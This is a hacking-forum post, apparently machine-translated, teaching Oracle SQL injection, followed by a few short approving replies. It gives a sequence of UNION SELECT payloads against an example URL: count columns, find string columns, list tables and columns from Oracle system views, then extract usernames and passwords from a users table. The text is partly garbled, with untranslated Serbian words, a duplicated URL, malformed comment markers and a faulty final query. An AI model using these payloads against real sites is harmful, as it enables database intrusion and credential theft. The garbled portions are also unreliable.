[ Oracle Injection ]

[Matrix]

[Oracle Injection Full Guide] [/ b]
By Matrix@evilzone.org (do not fucking touch copyright)


[table of content]

• How to check if the site was vulnerable to Oracle injection
• [1] Find out how many columns
  [2] from the database Extraktovanje
  [3] The drawing table
  [4] The drawing data from tables
  [5] The drawing data from columns
  
  
  
• How to check if the site was vulnerable to Oracle injection

Adding "UNION SELECT NULL from dual -" (without the quotes) example:


http://www.primer.rs/index.php?id=1 UNION SELECT NULL from dual - ]


If it comes to Oracle should get errors like this:


[Oracle] [ODBC] [Ora] ORA-01789: query block has incorrect number of resultcolumns


-------------------------------------------------------------------------------


[1] Find out how many columns
Adding a NULL until you get the error you find out the number of columns.


 http://www.primer.rs/index.php?id=1 UNION SELECT NULL, NULL, NULL from dual -


-------------------------------------------------------------------------------


[2] from the database Extraktovanje
Now that we know the number of columns it is time to draw what we can from the DB.
Now we need to know which column is usable and to use "string". In order to do this you need to "NULL" replace with 'a'. If you get an error 'and' replace with "NULL" and move on to the next "NULL" and so on until you get the error continue. An example of this:


http://www.primer.rs/index.php?id=1 UNION SELECT NULL, 'a', 'a' from dual -


-------------------------------------------------------------------------------


[3] Izlacenje table
When you find a column that can be used you can start looking for table names. To perform this we use the "user_objects". We also used the "object_name" and "object_type" to show the table name and its type.


http://www.primer.rs/index.php?id=1]http://www.primer.rs/index.php?id=1]http://www.primer.rs/index.php?id=1 UNION SELECT NULL, object_name, object_type from user_objects--


(You can only use NULL's where mistakes were shown, that one 'a', 'a' in the link replace the object_name, object_type. Alternatively you can use instead all_user_objects user_object)


-------------------------------------------------------------------------------


[4] The drawing data from tables
You should now see all the tables in the database. If you do not see them try to delete all NULL's and find the columns that use some type of string.
We have found table users will now try to extract data from it as follows:


http://www.primer.rs/index.php?id=1 UNION SELECT NULL, column_name, null from user_tab_columns where table_name = Users--


-------------------------------------------------- -----------------------------


[5] The drawing data from columns
Now it was time to pull the data from columns that usernames and passwords as follows:


http://www.primer.rs/index.php?id=1 UNION SELECT NULL, login, password from users --


You will receive a username and password data!


If there is only one column that uses the string type to try to extract data as follows:


http://www.primer.rs/index.php?id=1 UNION SELECT NULL, login||:||password, NULL from user_objects -

[Stackprotector]

Good contribution:).  will take a look, thanks

[Techie]

Good tut.

[Rafy]

Well done!I was searching for a tutorial on oracle injection!

[_ANONYMOUS_]

Nice